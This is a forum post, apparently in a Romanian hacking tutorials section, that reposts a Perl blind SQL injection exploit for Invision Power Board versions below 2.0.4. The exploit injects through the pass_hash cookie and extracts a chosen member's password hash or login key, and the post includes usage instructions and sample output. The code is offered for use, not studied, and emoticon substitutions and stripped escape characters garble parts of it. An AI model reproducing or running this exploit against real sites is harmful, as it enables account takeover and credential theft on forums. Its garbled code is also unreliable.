Jump to content
RedJoker

hacking ipb forum

By RedJoker, in Tutoriale in romana

Recommended Posts

RedJoker Newbie

RedJoker

Posted
Posted

#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC

## vulnerable forum versions : 1.* , 2.* (<2.0.4)

## tested on version 1.3 Final and version 2.0.2

## * work on all mysql versions

## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)

## ©oded by 1dt.w0lf

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## screen:

## ~~~~~~~

## r57ipb2.pl blah.com /ipb13/ 1 0

## [~] SERVER : blah.com

## [~] PATH : /ipb13/

## [~] MEMBER ID : 1

## [~] TARGET : 0 - IPB 1.*

## [~] SEARCHING PASSWORD ... [ DONE ]

##

## MEMBER ID : 1

## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99

##

## r57ipb2.pl blah.com /ipb202/ 1 1

## [~] SERVER : blah.com

## [~] PATH : /ipb202/

## [~] MEMBER ID : 1

## [~] TARGET : 1 - IPB 2.*

## [~] SEARCHING PASSWORD ... [ DONE ]

##

## MEMBER ID : 1

## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## Greets: James Bercegay of the GulfTech Security Research Team

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];

$path = $ARGV[1];

$member_id = $ARGV[2];

$target = $ARGV[3];

$pass = ($target)?('member_login_key')Sad'password');

$server =~ s!(http://)!!;

$request = 'http://';

$request .= $server;

$request .= $path;

$s_num = 1;

$|++;

$n = 0;

print "[~] SERVER : $serverrn";

print "[~] PATH : $pathrn";

print "[~] MEMBER ID : $member_idrn";

print "[~] TARGET : $target";

print (($target)?(' - IPB 2.*')Sad' - IPB 1.*'));

print "rn";

print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)

{

if(&found(47,5Cool==0) { &found(96,122); }

$char = $i;

if ($char=="0")

{

if(length($allchar) > 0){

print qq{bb DONE ]

MEMBER ID : $member_id

};

print (($target)?('MEMBER_LOGIN_KEY : ')Sad'PASSWORD : '));

print $allchar."rn";

}

else

{

print "bb FAILED ]";

}

exit();

}

else

{

$allchar .= chr($i);

}

$s_num++;

}

sub found($$)

{

my $fmin = $_[0];

my $fmax = $_[1];

if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);

$check = " BETWEEN $r AND $fmax";

if ( &check($check) ) { &found($r,$fmax); }

else { &found($fmin,$r); }

}

sub crack($$)

{

my $cmin = $_[0];

my $cmax = $_[1];

$i = $cmin;

while ($i<$cmax)

{

$crcheck = "=$i";

if ( &check($crcheck) ) { return $i; }

$i++;

}

$i = 0;

return $i;

}

sub check($)

{

$n++;

status();

$ccheck = $_[0];

$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";

$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";

$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";

$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0nHost: %snAccept: */*nCookie: member_id=%s; pass_hash=%s%s%s%s%snConnection: closenn",

$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)

{

if (/Set-Cookie: session_id=0;/) { return 1; }

}

return 0;

}

sub status()

{

$status = $n % 5;

if($status==0){ print "bb/]"; }

if($status==1){ print "bb-]"; }

if($status==2){ print "bb]"; }

if($status==3){ print "bb|]"; }

}

sub usage()

{

print q(

Invision Power Board v < 2.0.4 SQL injection exploit

----------------------------------------------------

USAGE:

~~~~~~

r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed

[/folder/] - folder where IPB installed

[member_id] - user id for brute

targets:

0 - IPB 1.*

1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1    :o

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...